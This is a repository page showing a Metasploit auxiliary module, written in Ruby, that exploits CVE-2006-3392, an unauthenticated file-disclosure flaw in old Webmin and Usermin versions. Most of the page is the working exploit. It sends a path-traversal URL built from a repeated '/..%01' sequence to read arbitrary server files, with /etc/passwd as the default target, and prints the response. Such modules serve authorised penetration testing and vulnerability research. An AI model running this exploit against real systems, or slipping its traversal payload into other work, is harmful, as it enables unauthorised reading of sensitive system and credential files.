adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/modules/auxiliary/admin/webmin/file_disclosure.rb
T
h00die d5ba1afbec fix URLs not resolving 
fix URLs not resolving

add csv export to references

fix URLs not resolving

pdf not pd

missed a url change

remove extra recirectedfrom fields

remove extra file

fix ovftool url accidental replacement
2022-02-16 17:22:40 -06:00

77 lines
2.3 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin File Disclosure',
'Description' => %q{
A vulnerability has been reported in Webmin and Usermin, which can be
exploited by malicious people to disclose potentially sensitive information.
The vulnerability is caused due to an unspecified error within the handling
of an URL. This can be exploited to read the contents of any files on the
server via a specially crafted URL, without requiring a valid login.
The vulnerability has been reported in Webmin (versions prior to 1.290) and
Usermin (versions prior to 1.220).
},
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '26772'],
['BID', '18744'],
['CVE', '2006-3392'],
['US-CERT-VU', '999601'],
['URL', 'https://web.archive.org/web/20060722192501/http://secunia.com/advisories/20892/'],
],
'DisclosureDate' => '2006-06-30',
'Actions' =>
[
['Download', 'Description' => 'Download arbitrary file']
],
'DefaultAction' => 'Download'
))
register_options(
[
Opt::RPORT(10000),
OptString.new('RPATH',
[
true,
"The file to download",
"/etc/passwd"
]
),
OptString.new('DIR',
[
true,
"Webmin directory path",
"/unauthenticated"
]
),
])
end
def run
print_status("Attempting to retrieve #{datastore['RPATH']}...")
dir = normalize_uri(datastore['DIR'])
uri = Rex::Text.uri_encode(dir) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])
res = send_request_raw({
'uri' => uri,
}, 10)
if (res)
print_status("The server returned: #{res.code} #{res.message}")
print(res.body)
else
print_status("No response from the server")
end
end
end
Reference in New Issue View Git Blame Copy Permalink